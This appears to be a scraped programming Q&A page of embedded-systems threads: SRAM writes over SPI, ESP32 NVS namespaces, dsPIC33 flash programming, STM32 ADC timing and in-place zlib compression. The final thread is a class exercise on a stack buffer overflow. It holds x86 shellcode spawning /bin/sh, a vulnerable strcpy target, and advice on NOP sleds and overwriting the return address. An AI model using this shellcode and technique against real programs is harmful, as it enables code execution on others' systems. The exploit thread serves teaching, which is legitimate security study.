Hi please find my code below, I am trying to write to SRAM. please help
my code below reads the output from a cell but i can't write to that cell
CS: pin 12
MOSI: pin 8
MISO: pin 10
SCK: pin 9
*/
#include <SPI.h>
//SRAM opcodes
#define RDSRAM 5 //00000101
#define WRSRAM 1 //00000001
#define READ 3 //00000011
#define WRITE 2 //00000010
int *ptr;
int CS = 12;
int CSS = 8;
char buf [90];
int response_pair;
int entryval;
int codeAddr = 545;
char s [90];
//char value = *(char*)0x5C;
uint8_t Spi23K640Rd8(uint32_t address){
uint8_t read_byte;
digitalWrite(CS,LOW);
SPI.transfer(READ);
//SPI.transfer((uint8_t)(address >> 16) & 0xff);
SPI.transfer((uint8_t)(address >> 8) & 0xff);
SPI.transfer((uint8_t)address);
read_byte = SPI.transfer(0x00);
digitalWrite(CS,HIGH);
return read_byte;
}
void Spi23K640Wr8(uint32_t address, uint8_t data_byte)
{
SPI.transfer(WRITE);
SPI.transfer((uint8_t)(address >> 16) & 0xff);
SPI.transfer((uint8_t)(address >> 8) & 0xff);
SPI.transfer((uint8_t)address);
SPI.transfer(data_byte);
}
void setup(void) {
// char *ptr;
// char myvar[1] = {545};
uint64_t i;
uint8_t value;
ptr=&codeAddr;
/* all pins on the Port B set to output-low */
pinMode(CSS, OUTPUT);
digitalWrite(CSS, HIGH);
pinMode(CS, OUTPUT);
Serial.begin(9600);
delay(2500);
SPI.begin();
for (i=0; i<=8192; i++) { // Do all memory locations, 64 Kbit SRAM = 65536 / 8 = 8192
Spi23K640Wr8(i, (uint8_t)i);
value = Spi23K640Rd8(i);
Serial.print((uint64_t)value, DEC);
if ( !(i % 32) && !(i==0) ) { // Every 32, do a new line and don't do the first item either
Serial.println(value);
} else
{ // Other wise, print a comma
Serial.print(",");
}
}
while (!Serial) ;
int response_pair = Spi23K640Rd8 (codeAddr);
Serial.println ("Enter Challenge");
//Spi23K640Wr8();
delay(500);
}
void loop() {
//while (!Serial) ;
int response_pair = Spi23K640Rd8 (codeAddr);
if (Serial.available ()) {
int n = Serial.readBytesUntil ('\n', buf, sizeof (buf)-1); //.toInt(); //save read value method to n
buf [n] = '\0';
sscanf (buf, "%o", &entryval); //check values
sprintf (s, " buf %s, response_pair %o entryval %o", buf, response_pair, entryval); //point the values from the pointer
if(entryval == response_pair )
{
Serial.println ("RESPONSE PAIR MATCHES ");
Serial.println ("loading address......");
Serial.print ("CRP address output = ");
Serial.println (Spi23K640Rd8(codeAddr), DEC); //prints out specific address
Serial.println ("Authenticate Chip");
Serial.println (s);
//delay (500);
}
else if (response_pair != entryval)
{
Serial.println ("INTRUDER ALERT!!!Wrong challenge");
Serial.println (s); //print the values in different types
delay (n);
}
// return;
// while (!Serial) ;
Serial.println();
Serial.println ("Enter Another Challenge"); //start the process again
//Serial.println (s); //print the values in different types
}
// put your main code here, to run repeatedly:
//Serial.println("Hello LoRa");
//delay(50);
//ptr++;
}
i was able to read the power up state but haven't had any luck writing to the SRAM cells
any suggestions will be appreciated. i am on a tight schedule.
disregard beloww
We have established that In order to evaluate the properties of the SRAM as a PUF, we perform a number of specifically selected tests to investigate the behaviour of the start-up values of the SRAM memory
• The technique can be viewed as an attempt to read multiple cells in a column at the same time, creating contention that is resolved according to process variation
• An authentication challenge is issued to the array of SRAM cells by activating two or more wordlines concurrently
• The response is simply the value that the SRAM produces from a read operation when the challenge condition is applied
• The number of challenges that can be applied the array of SRAM cells grows exponentially with the number of SRAM rows and these challenges can be applied at any time without power cycling
• providing an array of different responses on different chips ; these challenges are SRAM cells arranged in rows and columns where SRAM cells in each column and array share a worldlines
• SRAM cells in each column in the array share common is a graph illustrating the number of unbiased bit lines
The CS line is not asserted during the write operation, and the SRAM uses 16 and not 24-bit addresses. You can try changing your read and write functions to something like this:
uint8_t Spi23K640Rd8(uint16_t address) { // <-- change from uint32_t to uint16_t
uint8_t read_byte;
digitalWrite(CS, LOW); // That's good
SPI.transfer(READ); // Read # 16-bit address, that's good
SPI.transfer((uint8_t)(address >> 8) & 0xff);
SPI.transfer((uint8_t)address);
read_byte = SPI.transfer(0x00);
digitalWrite(CS, HIGH);
return read_byte;
}
void Spi23K640Wr8(uint16_t address, uint8_t data_byte) { // <-- change from uint32_t to uint16_t
digitalWrite(CS, LOW); // Was missing.
SPI.transfer(WRITE); // write #16-bit address
// SPI.transfer((uint8_t)(address >> 16) & 0xff); // <- BUG!!! this byte is not expected!
SPI.transfer((uint8_t)(address >> 8) & 0xff);
SPI.transfer((uint8_t)address);
SPI.transfer(data_byte);
digitalWrite(CS, HIGH); // clear CS.
}
Note: You should also consider renaming these functions to make your code easier to read.
How about replacing
uint8_t Spi23K640Rd8(uint16_t address);
void Spi23K640Wr8(uint16_t address, uint8_t data_byte);
With
uint8_t SRAM_23K640_ReadByte(uint16_t address);
void SRAM_23K640_WriteByte(uint16_t address, uint8_t data_byte);
Or whatever you see fit. Keep in mind that our eyes and brain have a much easier time reading shorter, pronounceable words. When the brain is too busy reading long mumbo jumbo, thinking about other things, like what the code does, becomes more difficult.
Related
I am using an ESP32 WROOM 32D module in a project using Arduino IDE. I want to utilise NVS facility with the help of Preferences.h library that it provides, although the data that can come through user would be stored in different namespaces and those could be utilised later. I can easily create simple one two namespaces but for this I need to use iteration. I have been scratching my head over this, but to no luck. I saw over on GitHub one person complain that it may not exactly be iteration friendly. Here's my code:
#include<Preferences.h>
Preferences ok;
String data1;
byte data2[2];byte data3[9];
byte buff[2];byte buf[9];
bool data4;
void setup() {
Serial.begin(115200);
for(int i=2; i<280; i++){
char testarray[]="test1";
testarray[4]=i;
ok.begin(testarray,false);
char datad1[20]="Code 15 launched 20";
datad1[15]=i;
ok.putString("data1", datad1);
ok.putBytes("data2","2",2);
ok.putBytes("data3","DF1BE29C",9);
ok.putBool("data4", true);
ok.end();
}
for(int i=2; i<280; i++){
char testarray[]="test1";
testarray[4]=i;
ok.begin(testarray,false);
data1=ok.getString("data1");
Serial.println(data1);
data2[2]=ok.getBytes("data2",buff,2);
Serial.print(data2[1], HEX);
Serial.print(data2[2], HEX);
Serial.println();
data3[9]=ok.getBytes("data3",buf,9);
for (int j = 0; j < sizeof(data3); j++) {
Serial.print(data3[j], HEX);
}
Serial.println();
data4=ok.getBool("data4");
Serial.println(data4);
ok.end();
}
}
void loop() {
}
Is there anything wrong with this? The format is simply const char* as the parameter of the namespace name, I just hoped that this would efficiently create test1, test2, test3, test4 namespaces.... but doesn't seem much feasible. Any guidance will be appreciated.
You cannot construct C strings like that:
char testarray[]="test1";
testarray[4]=i;
...
char datad1[20]="Code 15 launched 20";
datad1[15]=i;
This simply replaces the character '1' with numeric value 2, 3, .. 280. Numbers are not characters.
This is how you construct C strings with numbers in them:
char label[8]; // 4 chars for "test", 3 chars for 3 digit number, 1 char for NULL
snprintf(label, sizeof(label), "test%d", i);
I have some questions regarding the flash memory with a dspic33ep512mu810.
I'm aware of how it should be done:
set all the register for address, latches, etc. Then do the sequence to start the write procedure or call the builtins function.
But I find that there is some small difference between what I'm experiencing and what is in the DOC.
when writing the flash in WORD mode. In the DOC it is pretty straightforward. Following is the example code in the DOC
int varWord1L = 0xXXXX;
int varWord1H = 0x00XX;
int varWord2L = 0xXXXX;
int varWord2H = 0x00XX;
int TargetWriteAddressL; // bits<15:0>
int TargetWriteAddressH; // bits<22:16>
NVMCON = 0x4001; // Set WREN and word program mode
TBLPAG = 0xFA; // write latch upper address
NVMADR = TargetWriteAddressL; // set target write address
NVMADRU = TargetWriteAddressH;
__builtin_tblwtl(0,varWord1L); // load write latches
__builtin_tblwth(0,varWord1H);
__builtin_tblwtl(0x2,varWord2L);
__builtin_tblwth(0x2,varWord2H);
__builtin_disi(5); // Disable interrupts for NVM unlock sequence
__builtin_write_NVM(); // initiate write
while(NVMCONbits.WR == 1);
But that code doesn't work depending on the address where I want to write. I found a fix to write one WORD but I can't write 2 WORD where I want. I store everything in the aux memory so the upper address(NVMADRU) is always 0x7F for me. The NVMADR is the address I can change. What I'm seeing is that if the address where I want to write modulo 4 is not 0 then I have to put my value in the 2 last latches, otherwise I have to put the value in the first latches.
If address modulo 4 is not zero, it doesn't work like the doc code(above). The value that will be at the address will be what is in the second set of latches.
I fixed it for writing only one word at a time like this:
if(Address % 4)
{
__builtin_tblwtl(0, 0xFFFF);
__builtin_tblwth(0, 0x00FF);
__builtin_tblwtl(2, ValueL);
__builtin_tblwth(2, ValueH);
}
else
{
__builtin_tblwtl(0, ValueL);
__builtin_tblwth(0, ValueH);
__builtin_tblwtl(2, 0xFFFF);
__builtin_tblwth(2, 0x00FF);
}
I want to know why I'm seeing this behavior?
2)I also want to write a full row.
That also doesn't seem to work for me and I don't know why because I'm doing what is in the DOC.
I tried a simple write row code and at the end I just read back the first 3 or 4 element that I wrote to see if it works:
NVMCON = 0x4002; //set for row programming
TBLPAG = 0x00FA; //set address for the write latches
NVMADRU = 0x007F; //upper address of the aux memory
NVMADR = 0xE7FA;
int latchoffset;
latchoffset = 0;
__builtin_tblwtl(latchoffset, 0);
__builtin_tblwth(latchoffset, 0); //current = 0, available = 1
latchoffset+=2;
__builtin_tblwtl(latchoffset, 1);
__builtin_tblwth(latchoffset, 1); //current = 0, available = 1
latchoffset+=2;
.
. all the way to 127(I know I could have done it in a loop)
.
__builtin_tblwtl(latchoffset, 127);
__builtin_tblwth(latchoffset, 127);
INTCON2bits.GIE = 0; //stop interrupt
__builtin_write_NVM();
while(NVMCONbits.WR == 1);
INTCON2bits.GIE = 1; //start interrupt
int testaddress;
testaddress = 0xE7FA;
status = NVMemReadIntH(testaddress);
status = NVMemReadIntL(testaddress);
testaddress += 2;
status = NVMemReadIntH(testaddress);
status = NVMemReadIntL(testaddress);
testaddress += 2;
status = NVMemReadIntH(testaddress);
status = NVMemReadIntL(testaddress);
testaddress += 2;
status = NVMemReadIntH(testaddress);
status = NVMemReadIntL(testaddress);
What I see is that the value that is stored in the address 0xE7FA is 125, in 0xE7FC is 126 and in 0xE7FE is 127. And the rest are all 0xFFFF.
Why is it taking only the last 3 latches and write them in the first 3 address?
Thanks in advance for your help people.
The dsPIC33 program memory space is treated as 24 bits wide, it is
more appropriate to think of each address of the program memory as a
lower and upper word, with the upper byte of the upper word being
unimplemented
(dsPIC33EPXXX datasheet)
There is a phantom byte every two program words.
Your code
if(Address % 4)
{
__builtin_tblwtl(0, 0xFFFF);
__builtin_tblwth(0, 0x00FF);
__builtin_tblwtl(2, ValueL);
__builtin_tblwth(2, ValueH);
}
else
{
__builtin_tblwtl(0, ValueL);
__builtin_tblwth(0, ValueH);
__builtin_tblwtl(2, 0xFFFF);
__builtin_tblwth(2, 0x00FF);
}
...will be fine for writing a bootloader if generating values from a valid Intel HEX file, but doesn't make it simple for storing data structures because the phantom byte is not taken into account.
If you create a uint32_t variable and look at the compiled HEX file, you'll notice that it in fact uses up the least significant words of two 24-bit program words. I.e. the 32-bit value is placed into a 64-bit range but only 48-bits out of the 64-bits are programmable, the others are phantom bytes (or zeros). Leaving three bytes per address modulo of 4 that are actually programmable.
What I tend to do if writing data is to keep everything 32-bit aligned and do the same as the compiler does.
Writing:
UINT32 value = ....;
:
__builtin_tblwtl(0, value.word.word_L); // least significant word of 32-bit value placed here
__builtin_tblwth(0, 0x00); // phantom byte + unused byte
__builtin_tblwtl(2, value.word.word_H); // most significant word of 32-bit value placed here
__builtin_tblwth(2, 0x00); // phantom byte + unused byte
Reading:
UINT32 *value
:
value->word.word_L = __builtin_tblrdl(offset);
value->word.word_H = __builtin_tblrdl(offset+2);
UINT32 structure:
typedef union _UINT32 {
uint32_t val32;
struct {
uint16_t word_L;
uint16_t word_H;
} word;
uint8_t bytes[4];
} UINT32;
I measure distance using ultrasonic signal. STM32F1 generate Ultrasound signal, STM32F4 writing this signal using microphone. Both STM32 are synchronized using signal generated another device, they connected one wire.
Question: Why signal comes with different times? although I don’t move receiver or transmitter. It's gives errors 50mm.
Dispersion signals
Code of receiver is here:
while (1)
{
if(HAL_GPIO_ReadPin(GPIOA, GPIO_PIN_5) != 0x00)
{
Get_UZ_Signal(uz_signal);
Send_Signal(uz_signal);
}
}
void Get_UZ_Signal(uint16_t* uz_signal)
{
int i,j;
uint16_t uz_buf[10];
HAL_ADC_Start_DMA(&hadc1, (uint32_t*)&uz_buf, 300000);
for(i = 0; i<lenght_signal; i++)
{
j=10;
while(j>0)
{
j--;
}
uz_signal[i] = uz_buf[0];
}
HAL_ADC_Stop_DMA(&hadc1);
}
hadc1.Instance = ADC1;
hadc1.Init.ClockPrescaler = ADC_CLOCK_SYNC_PCLK_DIV4;
hadc1.Init.Resolution = ADC_RESOLUTION_12B;
hadc1.Init.ScanConvMode = DISABLE;
hadc1.Init.ContinuousConvMode = ENABLE;
hadc1.Init.DiscontinuousConvMode = DISABLE;
hadc1.Init.ExternalTrigConvEdge = ADC_EXTERNALTRIGCONVEDGE_NONE;
hadc1.Init.ExternalTrigConv = ADC_SOFTWARE_START;
hadc1.Init.DataAlign = ADC_DATAALIGN_RIGHT;
hadc1.Init.NbrOfConversion = 1;
hadc1.Init.DMAContinuousRequests = DISABLE;
hadc1.Init.EOCSelection = ADC_EOC_SINGLE_CONV;
More information here:
https://github.com/BooSooV/Indoor-Ultrasonic-Positioning-System/tree/master/Studying_ultrasonic_signals/Measured_lengths_dispersion
PROBLEM RESOLVED
Dispersion signals final
The time errors was created by the transmitter, I make some changed in it. Now synchro signal takes with help EXTI, and PWM generated all time, and I controlee signal with Enable or Disable pin on driver. Now I have dispersion 5mm, it enough for me.
Final programs is here
https://github.com/BooSooV/Indoor-Ultrasonic-Positioning-System/tree/master/Studying_ultrasonic_signals/Measured_lengths_dispersion
Maybe, It is a problem of time processing. The speed of sound is 343 meters / sec. Then, 50mm is about 0.15 msec.
Have you thought to call HAL_ADC_Start_DMA() from the main()
uint16_t uz_buf[10];
HAL_ADC_Start_DMA(&hadc1, (uint32_t*)&uz_buf, 10 );//300000);
// Sizeof Buffer ---------------------^
and you call
void Get_UZ_Signal(uint16_t* uz_signal) {
int i;
// For debugging - Get the time to process
// Get the Time from the System Tick. This counter wrap around
// from 0 to SysTick->LOAD every 1 msec
int32_t startTime = SysTick->VAL;
__HAL_ADC_ENABLE(&hadc1); // Start the DMA
// return remaining data units in the current DMA Channel transfer
while(__HAL_DMA_GET_COUNTER(&hadc1) != 0)
;
for(i = 0; i<lenght_signal; i++) {
// uz_signal[i] = uz_buf[0];
// 0 or i ------------^
uz_signal[i] = uz_buf[i];
__HAL_ADC_DISABLE(&hadc1); // Stop the DMA
int32_t endTime = SysTick->VAL;
// check if negative, case of wrap around
int32_t difTime = endTime - startTime;
if ( difTime < 0 )
difTime += SysTick->LOAD
__HAL_DMA_SET_COUNTER(&hadc1, 10); // Reset the counter
// If the DMA buffer is 10, the COUNTER will start at 10
// and decrement
// Ref. Manual: 9.4.4 DMA channel x number of data register (DMA_CNDTRx)
In your code
MX_USART1_UART_Init();
HAL_ADC_Start_DMA(&hadc1, (uint32_t*)&uz_signal, 30000);
// Must be stopped because is running now
// How long is the buffer: uint16_t uz_signal[ 30000 ] ?
__HAL_ADC_DISABLE(&hadc1); // must be disable
// reset the counter
__HAL_DMA_SET_COUNTER(&hdma_adc1, 30000);
while (1)
{
if(HAL_GPIO_ReadPin(GPIOA, GPIO_PIN_5) != 0x00)
{
__HAL_ADC_ENABLE(&hadc1);
while(__HAL_DMA_GET_COUNTER(&hdma_adc1) != 0)
;
__HAL_ADC_DISABLE(&hadc1);
__HAL_DMA_SET_COUNTER(&hdma_adc1, 30000);
// 30,000 is the sizeof your buffer?
...
}
}
I made some test with uC STM32F407 # 168mHz. I'll show you the code below.
The speed of sound is 343 meters / second.
During the test, I calculated the time to process the ADC conversion. Each conversion takes about 0.35 uSec (60 ticks).
Result
Size Corresponding
Array Time Distance
100 0.041ms 14mm
1600 0.571ms 196mm
10000 3.57ms 1225mm
In the code, you'll see the start time. Be careful, the SysTick is a decremental counter starting # the uC speed (168MHz = from 168000 to 0). It could be good idea to get the msec time with HAL_GetTick(), and usec with SysTick.
int main(void)
{
...
MX_DMA_Init();
MX_ADC1_Init();
// Configure the channel in the way you want
ADC_ChannelConfTypeDef sConfig;
sConfig.Channel = ADC_CHANNEL_0; //ADC1_CHANNEL;
sConfig.Rank = 1;
sConfig.SamplingTime = ADC_SAMPLETIME_3CYCLES;
sConfig.Offset = 0;
HAL_ADC_ConfigChannel(&hadc1, &sConfig);
// Start the DMA channel and Stop it
HAL_ADC_Start_DMA(&hadc1, (uint32_t*)&uz_signal, sizeof( uz_signal ) / sizeof( uint16_t ));
HAL_ADC_Stop_DMA( &hadc1 );
// The SysTick is a decrement counter
// Can be use to count usec
// https://www.sciencedirect.com/topics/engineering/systick-timer
tickLoad = SysTick->LOAD;
while (1)
{
// Set the buffer to zero
for( uint32_t i=0; i < (sizeof( uz_signal ) / sizeof( uint16_t )); i++)
uz_signal[i] = 0;
// Reset the counter ready to restart
DMA2_Stream0->NDTR = (uint16_t)(sizeof( uz_signal ) / sizeof( uint16_t ));
/* Enable the Peripheral */
ADC1->CR2 |= ADC_CR2_ADON;
/* Start conversion if ADC is effectively enabled */
/* Clear regular group conversion flag and overrun flag */
ADC1->SR = ~(ADC_FLAG_EOC | ADC_FLAG_OVR);
/* Enable ADC overrun interrupt */
ADC1->CR1 |= (ADC_IT_OVR);
/* Enable ADC DMA mode */
ADC1->CR2 |= ADC_CR2_DMA;
/* Start the DMA channel */
/* Enable Common interrupts*/
DMA2_Stream0->CR |= DMA_IT_TC | DMA_IT_TE | DMA_IT_DME | DMA_IT_HT;
DMA2_Stream0->FCR |= DMA_IT_FE;
DMA2_Stream0->CR |= DMA_SxCR_EN;
//===================================================
// The DMA is ready to start
// Your if(HAL_GPIO_ReadPin( ... ) will be here
HAL_Delay( 10 );
//===================================================
// Get the time
tickStart = SysTick->VAL;
// Start the DMA
ADC1->CR2 |= (uint32_t)ADC_CR2_SWSTART;
// Wait until the conversion is completed
while( DMA2_Stream0->NDTR != 0)
;
// Get end time
tickEnd = SysTick->VAL;
/* Stop potential conversion on going, on regular and injected groups */
ADC1->CR2 &= ~ADC_CR2_ADON;
/* Disable the selected ADC DMA mode */
ADC1->CR2 &= ~ADC_CR2_DMA;
/* Disable ADC overrun interrupt */
ADC1->CR1 &= ~(ADC_IT_OVR);
// Get processing time
tickDiff = tickStart - tickEnd;
//===================================================
// Your processing will go here
HAL_Delay( 10 );
//===================================================
}
}
So, you'll have the start and end time. I think you have to make the formula on the start time.
Good luck
If you want to know the execution time, you could use that little function. It returns the micro Seconds
static uint32_t timeMicroSecDivider = 0;
extern uint32_t uwTick;
// The SysTick->LOAD matchs the uC Speed / 1000.
// If the uC clock is 80MHz, the the LOAD is 80000
// The SysTick->VAL is a decrement counter from (LOAD-1) to 0
//====================================================
uint64_t getTimeMicroSec()
{
if ( timeMicroSecDivider == 0)
{
// Number of clock by micro second
timeMicroSecDivider = SysTick->LOAD / 1000;
}
return( (uwTick * 1000) + ((SysTick->LOAD - SysTick->VAL) / timeMicroSecDivider));
}
I have a character buffer that I would like to compress in place. Right now I have it set up so there are two buffers and zlib's deflate reads from the input buffer and writes to the output buffer. Then I have to change the input buffer pointer to point to the output buffer and free the old input buffer. This seems like an unnecessary amount of allocation. Since zlib is compressing, the next_out pointer should always lag behind the next_in pointer. Anyway, I can't find enough documentation to verify this and was hoping someone had some experience with this. Thanks for your time!
It can be done, with some care. The routine below does it. Not all data is compressible, so you have to handle the case where the output data catches up with the input data. It takes a lot of incompressible data, but it can happen (see comments in code), in which case you have to allocate a buffer to temporarily hold the remaining input.
/* Compress buf[0..len-1] in place into buf[0..*max-1]. *max must be greater
than or equal to len. Return Z_OK on success, Z_BUF_ERROR if *max is not
enough output space, Z_MEM_ERROR if there is not enough memory, or
Z_STREAM_ERROR if *strm is corrupted (e.g. if it wasn't initialized or if it
was inadvertently written over). If Z_OK is returned, *max is set to the
actual size of the output. If Z_BUF_ERROR is returned, then *max is
unchanged and buf[] is filled with *max bytes of uncompressed data (which is
not all of it, but as much as would fit).
Incompressible data will require more output space than len, so max should
be sufficiently greater than len to handle that case in order to avoid a
Z_BUF_ERROR. To assure that there is enough output space, max should be
greater than or equal to the result of deflateBound(strm, len).
strm is a deflate stream structure that has already been successfully
initialized by deflateInit() or deflateInit2(). That structure can be
reused across multiple calls to deflate_inplace(). This avoids unnecessary
memory allocations and deallocations from the repeated use of deflateInit()
and deflateEnd(). */
int deflate_inplace(z_stream *strm, unsigned char *buf, unsigned len,
unsigned *max)
{
int ret; /* return code from deflate functions */
unsigned have; /* number of bytes in temp[] */
unsigned char *hold; /* allocated buffer to hold input data */
unsigned char temp[11]; /* must be large enough to hold zlib or gzip
header (if any) and one more byte -- 11
works for the worst case here, but if gzip
encoding is used and a deflateSetHeader()
call is inserted in this code after the
deflateReset(), then the 11 needs to be
increased to accomodate the resulting gzip
header size plus one */
/* initialize deflate stream and point to the input data */
ret = deflateReset(strm);
if (ret != Z_OK)
return ret;
strm->next_in = buf;
strm->avail_in = len;
/* kick start the process with a temporary output buffer -- this allows
deflate to consume a large chunk of input data in order to make room for
output data there */
if (*max < len)
*max = len;
strm->next_out = temp;
strm->avail_out = sizeof(temp) > *max ? *max : sizeof(temp);
ret = deflate(strm, Z_FINISH);
if (ret == Z_STREAM_ERROR)
return ret;
/* if we can, copy the temporary output data to the consumed portion of the
input buffer, and then continue to write up to the start of the consumed
input for as long as possible */
have = strm->next_out - temp;
if (have <= (strm->avail_in ? len - strm->avail_in : *max)) {
memcpy(buf, temp, have);
strm->next_out = buf + have;
have = 0;
while (ret == Z_OK) {
strm->avail_out = strm->avail_in ? strm->next_in - strm->next_out :
(buf + *max) - strm->next_out;
ret = deflate(strm, Z_FINISH);
}
if (ret != Z_BUF_ERROR || strm->avail_in == 0) {
*max = strm->next_out - buf;
return ret == Z_STREAM_END ? Z_OK : ret;
}
}
/* the output caught up with the input due to insufficiently compressible
data -- copy the remaining input data into an allocated buffer and
complete the compression from there to the now empty input buffer (this
will only occur for long incompressible streams, more than ~20 MB for
the default deflate memLevel of 8, or when *max is too small and less
than the length of the header plus one byte) */
hold = strm->zalloc(strm->opaque, strm->avail_in, 1);
if (hold == Z_NULL)
return Z_MEM_ERROR;
memcpy(hold, strm->next_in, strm->avail_in);
strm->next_in = hold;
if (have) {
memcpy(buf, temp, have);
strm->next_out = buf + have;
}
strm->avail_out = (buf + *max) - strm->next_out;
ret = deflate(strm, Z_FINISH);
strm->zfree(strm->opaque, hold);
*max = strm->next_out - buf;
return ret == Z_OK ? Z_BUF_ERROR : (ret == Z_STREAM_END ? Z_OK : ret);
}
I'm trying to figure out this problem for one of my comp sci classes, I've utilized every resource and still having issues, if someone could provide some insight, I'd greatly appreciate it.
I have this "target" I need to execute a execve(“/bin/sh”) with the buffer overflow exploit. In the overflow of buf[128], when executing the unsafe command strcpy, a pointer back into the buffer appears in the location where the system expects to find return address.
target.c
int bar(char *arg, char *out)
{
strcpy(out,arg);
return 0;
}
int foo(char *argv[])
{
char buf[128];
bar(argv[1], buf);
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
fprintf(stderr, "target: argc != 2");
exit(EXIT_FAILURE);
}
foo(argv);
return 0;
}
exploit.c
#include "shellcode.h"
#define TARGET "/tmp/target1"
int main(void)
{
char *args[3];
char *env[1];
args[0] = TARGET; args[1] = "hi there"; args[2] = NULL;
env[0] = NULL;
if (0 > execve(TARGET, args, env))
fprintf(stderr, "execve failed.\n");
return 0;
}
shellcode.h
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
I understand I need to fill argv[1] with over 128 bytes, the bytes over 128 being the return address, which should be pointed back to the buffer so it executes the /bin/sh within. Is that correct thus far? Can someone provide the next step?
Thanks very much for any help.
Well, so you want the program to execute your shellcode. It's already in machine form, so it's ready to be executed by the system. You've stored it in a buffer. So, the question would be "How does the system know to execute my code?" More precisely, "How does the system know where to look for the next code to be executed?" The answer in this case is the return address you're talking about.
Basically, you're on the right track. Have you tried executing the code? One thing I've noticed when performing this type of exploit is that it's not an exact science. Sometimes, there are other things in memory that you don't expect to be there, so you have to increase the number of bytes you add into your buffer in order to correctly align the return address with where the system expects it to be.
I'm not a specialist in security, but I can tell you a few things that might help. One is that I usually include a 'NOP Sled' - essentially just a series of 0x90 bytes that don't do anything other than execute 'NOP' instructions on the processor. Another trick is to repeat the return address at the end of the buffer, so that if even one of them overwrites the return address on the stack, you'll have a successful return to where you want.
So, your buffer will look like this:
| NOP SLED | SHELLCODE | REPEATED RETURN ADDRESS |
(Note: These aren't my ideas, I got them from Hacking: The Art of Exploitation, by Jon Erickson. I recommend this book if you're interested in learning more about this).
To calculate the address, you can use something similar to the following:
unsigned long sp(void)
{ __asm__("movl %esp, %eax");} // returns the address of the stack pointer
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char* buffer;
offset = 0;
esp = sp();
ret = esp - offset;
}
Now, ret will hold the return address you want to return to, assuming that you allocate buffer to be on the heap.